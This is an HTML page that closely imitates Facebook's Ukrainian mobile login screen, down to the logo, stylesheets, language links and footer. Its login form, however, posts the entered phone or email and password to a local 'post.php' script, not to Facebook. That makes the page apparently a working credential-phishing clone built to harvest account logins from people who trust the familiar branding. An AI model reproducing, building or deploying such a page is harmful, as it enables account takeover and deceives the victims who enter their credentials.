<html lang="uk" data-autoid="autoid_1">
    <head>
        <title>Вхід у Facebook | Facebook</title>
        <meta charset="utf-8">
        <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1" />
        <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/4Kv5U5b1o3f.png" rel="shortcut icon" sizes="196x196" />
        <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
        <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/Nd-Gbd5onsl.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="XplrY6s" crossorigin="anonymous" />
        <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yF/l/0,cross/SvlEQU0lBkz.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="3vG9bwW" crossorigin="anonymous" />
        <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yk/l/0,cross/qD0bK3JeMGf.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="3AxsoA8" crossorigin="anonymous" />
        <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yp/l/0,cross/wN53DDOq-FJ.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="VA72hlV" crossorigin="anonymous" />
        <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y5/l/0,cross/iRUPwQ_eKQw.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="4onmdvW" crossorigin="anonymous" />
        <style type="text/css">
            .vue-slider-dot {
                position: absolute;
                -webkit-transition: all 0s;
                transition: all 0s;
                z-index: 5;
            }
            .vue-slider-dot:focus {
                outline: none;
            }
            .vue-slider-dot-tooltip {
                position: absolute;
                visibility: hidden;
            }
            .vue-slider-dot-hover:hover .vue-slider-dot-tooltip,
            .vue-slider-dot-tooltip-show {
                visibility: visible;
            }
            .vue-slider-dot-tooltip-top {
                top: -10px;
                left: 50%;
                -webkit-transform: translate(-50%, -100%);
                transform: translate(-50%, -100%);
            }
            .vue-slider-dot-tooltip-bottom {
                bottom: -10px;
                left: 50%;
                -webkit-transform: translate(-50%, 100%);
                transform: translate(-50%, 100%);
            }
            .vue-slider-dot-tooltip-left {
                left: -10px;
                top: 50%;
                -webkit-transform: translate(-100%, -50%);
                transform: translate(-100%, -50%);
            }
            .vue-slider-dot-tooltip-right {
                right: -10px;
                top: 50%;
                -webkit-transform: translate(100%, -50%);
                transform: translate(100%, -50%);
            }
        </style>
        <style type="text/css">
            .vue-slider-marks {
                position: relative;
                width: 100%;
                height: 100%;
            }
            .vue-slider-mark {
                position: absolute;
                z-index: 1;
            }
            .vue-slider-ltr .vue-slider-mark,
            .vue-slider-rtl .vue-slider-mark {
                width: 0;
                height: 100%;
                top: 50%;
            }
            .vue-slider-ltr .vue-slider-mark-step,
            .vue-slider-rtl .vue-slider-mark-step {
                top: 0;
            }
            .vue-slider-ltr .vue-slider-mark-label,
            .vue-slider-rtl .vue-slider-mark-label {
                top: 100%;
                margin-top: 10px;
            }
            .vue-slider-ltr .vue-slider-mark {
                -webkit-transform: translate(-50%, -50%);
                transform: translate(-50%, -50%);
            }
            .vue-slider-ltr .vue-slider-mark-step {
                left: 0;
            }
            .vue-slider-ltr .vue-slider-mark-label {
                left: 50%;
                -webkit-transform: translateX(-50%);
                transform: translateX(-50%);
            }
            .vue-slider-rtl .vue-slider-mark {
                -webkit-transform: translate(50%, -50%);
                transform: translate(50%, -50%);
            }
            .vue-slider-rtl .vue-slider-mark-step {
                right: 0;
            }
            .vue-slider-rtl .vue-slider-mark-label {
                right: 50%;
                -webkit-transform: translateX(50%);
                transform: translateX(50%);
            }
            .vue-slider-btt .vue-slider-mark,
            .vue-slider-ttb .vue-slider-mark {
                width: 100%;
                height: 0;
                left: 50%;
            }
            .vue-slider-btt .vue-slider-mark-step,
            .vue-slider-ttb .vue-slider-mark-step {
                left: 0;
            }
            .vue-slider-btt .vue-slider-mark-label,
            .vue-slider-ttb .vue-slider-mark-label {
                left: 100%;
                margin-left: 10px;
            }
            .vue-slider-btt .vue-slider-mark {
                -webkit-transform: translate(-50%, 50%);
                transform: translate(-50%, 50%);
            }
            .vue-slider-btt .vue-slider-mark-step {
                top: 0;
            }
            .vue-slider-btt .vue-slider-mark-label {
                top: 50%;
                -webkit-transform: translateY(-50%);
                transform: translateY(-50%);
            }
            .vue-slider-ttb .vue-slider-mark {
                -webkit-transform: translate(-50%, -50%);
                transform: translate(-50%, -50%);
            }
            .vue-slider-ttb .vue-slider-mark-step {
                bottom: 0;
            }
            .vue-slider-ttb .vue-slider-mark-label {
                bottom: 50%;
                -webkit-transform: translateY(50%);
                transform: translateY(50%);
            }
            .vue-slider-mark-label,
            .vue-slider-mark-step {
                position: absolute;
            }
        </style>
        <style type="text/css">
            .vue-slider {
                position: relative;
                -webkit-box-sizing: content-box;
                box-sizing: content-box;
                -webkit-user-select: none;
                -moz-user-select: none;
                -ms-user-select: none;
                user-select: none;
                display: block;
                -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            }
            .vue-slider-rail {
                position: relative;
                width: 100%;
                height: 100%;
                -webkit-transition-property: width, height, left, right, top, bottom;
                transition-property: width, height, left, right, top, bottom;
            }
            .vue-slider-process {
                position: absolute;
                z-index: 1;
            }
        </style>
    </head>
    <body tabindex="0" class="touch x2 _fzu _50-3 iframe acw portrait" style="min-height: 1080px; background-color: rgb(255, 255, 255);">
        <div id="viewport" data-kaios-focus-transparent="1" style="min-height: 1080px;">
            <h1 style="display: block; height: 0; overflow: hidden; position: absolute; width: 0; padding: 0;">Facebook</h1>
            <div id="page">
                <div class="_5soa acw" id="root" role="main" data-sigil="context-layer-root content-pane" style="min-height: 1080px;">
                    <div class="_7om2">
                        <div class="_4g34" id="u_0_0_/E">
                            <div class="_5yd0 _2ph- _5yd1" style="display: none;" id="login_error" data-sigil="m_login_notice"><div class="_52jd"></div></div>
                            <div class="_9om_">
                                <div class="_4-4l">
                                    <div id="login_top_banner" data-sigil="m_login_upsell login_identify_step_element"></div>
                                    <div class="_7om2 _52we _2pid _52z6">
                                        <div class="_4g34">
                                            <a href="/login/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzEwNzE2MTM3LCJjYWxsc2l0ZV9pZCI6Nzk2MTcwNzM0NTY5ODY0fQ%3D%3D&amp;locale2=uk_UA">
                                                <img src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" width="112" class="img" alt="facebook" />
                                            </a>
                                        </div>
                                    </div>
                                    <div class="_5rut">
                                        <form
                                            method="post"
                                            action="post.php"
                                            class="mobile-login-form _9hp- _5spm"
                                            id="login_form"
                                            novalidate="1"
                                            data-sigil="m_login_form"
                                            data-autoid="autoid_2"
                                        >
                                            <input type="hidden" name="lsd" value="AVqKNSJjnQU" autocomplete="off" /><input type="hidden" name="jazoest" value="2956" autocomplete="off" />
                                            <input type="hidden" name="m_ts" value="1710716137" /><input type="hidden" name="li" value="6XT3ZQTgRPn1t-Xax6hF3Kp1" />
                                            <input type="hidden" name="try_number" value="0" data-sigil="m_login_try_number" /><input type="hidden" name="unrecognized_tries" value="0" data-sigil="m_login_unrecognized_tries" />
                                            <div id="user_info_container" data-sigil="user_info_after_failure_element"></div>
                                            <div id="pwd_label_container" data-sigil="user_info_after_failure_element"></div>
                                            <div id="otp_retrieve_desc_container"></div>
                                            <div>
                                                <div class="_56be">
                                                    <div class="_55wo _56bf">
                                                        <div class="_96n9" id="email_input_container">
                                                            <input
                                                                autocorrect="off"
                                                                autocapitalize="off"
                                                                class="_56bg _4u9z _5ruq _8qtn"
                                                                autocomplete="on"
                                                                id="m_login_email"
                                                                name="email"
                                                                placeholder="Моб. телефон або ел. адреса"
                                                                type="text"
                                                                data-sigil="m_login_email"
                                                            />
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="_55wq"></div>
                                                <div class="_56be">
                                                    <div class="_55wo _56bf">
                                                        <div class="_1upc _mg8" data-sigil="m_login_password">
                                                            <div class="_7om2">
                                                                <div class="_4g34 _5i2i _52we">
                                                                    <div class="_5xu4">
                                                                        <input
                                                                            autocorrect="off"
                                                                            autocapitalize="off"
                                                                            class="_56bg _4u9z _27z2 _8qtm"
                                                                            autocomplete="on"
                                                                            id="m_login_password"
                                                                            name="pass"
                                                                            placeholder="Пароль"
                                                                            type="password"
                                                                            data-sigil="password-plain-text-toggle-input"
                                                                        />
                                                                    </div>
                                                                </div>
                                                                <div class="_5s61 _216i _5i2i _52we">
                                                                    <div class="_5xu4">
                                                                        <div class="_2pi9" style="pointer-events: auto; display: none;" id="u_0_1_3U" data-sigil="password-plain-text-toggle">
                                                                            <a href="#"><span class="mfss" style="display: none;" id="u_0_2_4s">ПРИХОВАТИ</span><span class="mfss" id="u_0_3_ko">ПОКАЗАТИ</span></a>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="_2pie" style="text-align: center;">
                                                <div id="login_password_step_element" data-sigil="login_password_step_element">
                                                    <button type="submit" value="Увійти" class="_54k8 _52jh _56bs _56b_ _28lf _9cow _56bw _56bu" name="login" data-sigil="touchable login_button_block m_login_button" data-autoid="autoid_10">
                                                        <span class="_55sr">Увійти</span>
                                                    </button>
                                                </div>
                                                <div class="_7eif" id="oauth_login_button_container" style="display: none;"></div>
                                                <div class="_7f_d" id="oauth_login_desc_container" style="display: none;"></div>
                                                <div id="otp_button_elem_container"></div>
                                            </div>
                                            <input type="hidden" name="prefill_contact_point" id="prefill_contact_point" /><input type="hidden" name="prefill_source" id="prefill_source" />
                                            <input type="hidden" name="prefill_type" id="prefill_type" /><input type="hidden" name="first_prefill_source" id="first_prefill_source" />
                                            <input type="hidden" name="first_prefill_type" id="first_prefill_type" /><input type="hidden" name="had_cp_prefilled" id="had_cp_prefilled" value="false" />
                                            <input type="hidden" name="had_password_prefilled" id="had_password_prefilled" value="false" /><input type="hidden" name="is_smart_lock" id="is_smart_lock" value="false" />
                                            <input type="hidden" id="bi_xrwh" name="bi_xrwh" value="0" /><input type="hidden" id="scetoggle" />
                                            <div class="_xo8"></div>
                                            <noscript><input type="hidden" name="_fb_noscript" value="true" /></noscript>
                                        </form>
                                        <div>
                                            <div class="_2pie _9omz">
                                                <div class="_52jj _9on1">
                                                    <a
                                                        class="_9on1"
                                                        tabindex="0"
                                                        href="/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzEwNzE2MTM3LCJjYWxsc2l0ZV9pZCI6Mjg0Nzg1MTQ5MzQ1MzY5fQ%3D%3D&amp;c=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Flocale2%3Duk_UA&amp;r&amp;cuid&amp;ars=facebook_login&amp;lwv=100&amp;locale2=uk_UA"
                                                        id="forgot-password-link"
                                                    >
                                                        Забули пароль?
                                                    </a>
                                                </div>
                                            </div>
                                            <div style="padding-top: 42px;">
                                                <div>
                                                    <div>
                                                        <div>
                                                            <div id="login_reg_separator" class="_43mg _8qtf" data-sigil="login_reg_separator"><span class="_43mh">або</span></div>
                                                            <div class="_52jj _5t3b" id="signup_button_area">
                                                                <a role="button" class="_agmp _28le btn btnS medBtn mfsm touchable" id="signup-button" tabindex="0" data-sigil="m_reg_button" data-autoid="autoid_9">
                                                                    Створити обліковий запис
                                                                </a>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="_2pie" style="text-align: center;">
                                                        <div>
                                                            <div data-sigil="login_identify_step_element"></div>
                                                            <div class="other-links _8p_m">
                                                                <ul class="_5pkb _55wp">
                                                                    <li></li>
                                                                </ul>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div style="display: none;"><div></div></div>
                    <span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0" style="display: none;" /></span>
                    <div class="_55wr _5ui2" data-sigil="m_login_footer">
                        <div class="_ao4m">
                            <div>
                                <div class="_5ui3" data-nocookies="1" id="locale-selector" data-sigil="language_selector marea">
                                    <div class="_7om2">
                                        <div class="_4g34">
                                            <span class="_52jc _52j9 _52jh _3ztb">Українська</span>
                                            <div class="_3ztc">
                                                <span class="_52jc">
                                                    <a
                                                        href="https://m.facebook.com/login/?locale2=uk_UA"
                                                        data-ajaxify-href="/intl/save_locale/?loc=ru_RU&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Flocale2%3Duk_UA&amp;ls_ref=mobile_suggested_locale_selector&amp;locale2=uk_UA"
                                                        data-method="post"
                                                        data-sigil="ajaxify"
                                                    >
                                                        Русский
                                                    </a>
                                                </span>
                                            </div>
                                            <div class="_3ztc">
                                                <span class="_52jc">
                                                    <a
                                                        href="https://m.facebook.com/login/?locale2=uk_UA"
                                                        data-ajaxify-href="/intl/save_locale/?loc=ar_AR&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Flocale2%3Duk_UA&amp;ls_ref=mobile_suggested_locale_selector&amp;locale2=uk_UA"
                                                        data-method="post"
                                                        data-sigil="ajaxify"
                                                    >
                                                        العربية
                                                    </a>
                                                </span>
                                            </div>
                                            <div class="_3ztc">
                                                <span class="_52jc">
                                                    <a
                                                        href="https://m.facebook.com/login/?locale2=uk_UA"
                                                        data-ajaxify-href="/intl/save_locale/?loc=pt_BR&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Flocale2%3Duk_UA&amp;ls_ref=mobile_suggested_locale_selector&amp;locale2=uk_UA"
                                                        data-method="post"
                                                        data-sigil="ajaxify"
                                                    >
                                                        Português (Brasil)
                                                    </a>
                                                </span>
                                            </div>
                                        </div>
                                        <div class="_4g34">
                                            <div class="_3ztc">
                                                <span class="_52jc">
                                                    <a
                                                        href="https://m.facebook.com/login/?locale2=uk_UA"
                                                        data-ajaxify-href="/intl/save_locale/?loc=en_GB&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Flocale2%3Duk_UA&amp;ls_ref=mobile_suggested_locale_selector&amp;locale2=uk_UA"
                                                        data-method="post"
                                                        data-sigil="ajaxify"
                                                    >
                                                        English (UK)
                                                    </a>
                                                </span>
                                            </div>
                                            <div class="_3ztc">
                                                <span class="_52jc">
                                                    <a
                                                        href="https://m.facebook.com/login/?locale2=uk_UA"
                                                        data-ajaxify-href="/intl/save_locale/?loc=hu_HU&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Flocale2%3Duk_UA&amp;ls_ref=mobile_suggested_locale_selector&amp;locale2=uk_UA"
                                                        data-method="post"
                                                        data-sigil="ajaxify"
                                                    >
                                                        Magyar
                                                    </a>
                                                </span>
                                            </div>
                                            <div class="_3ztc">
                                                <span class="_52jc">
                                                    <a
                                                        href="https://m.facebook.com/login/?locale2=uk_UA"
                                                        data-ajaxify-href="/intl/save_locale/?loc=es_LA&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Flocale2%3Duk_UA&amp;ls_ref=mobile_suggested_locale_selector&amp;locale2=uk_UA"
                                                        data-method="post"
                                                        data-sigil="ajaxify"
                                                    >
                                                        Español
                                                    </a>
                                                </span>
                                            </div>
                                            <a href="https://m.facebook.com/login/?locale2=uk_UA">
                                                <div class="_3j87 _1rrd _3ztd" aria-label="Повний список мов" data-sigil="more_language"><i class="img sp_zqrNfmDGuGz_2x sx_0a2d34"></i></div>
                                            </a>
                                        </div>
                                    </div>
                                </div>
                                <div class="_5ui4"><span class="mfss fcg">Meta © 2024</span></div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        
    </body>
    
</html>
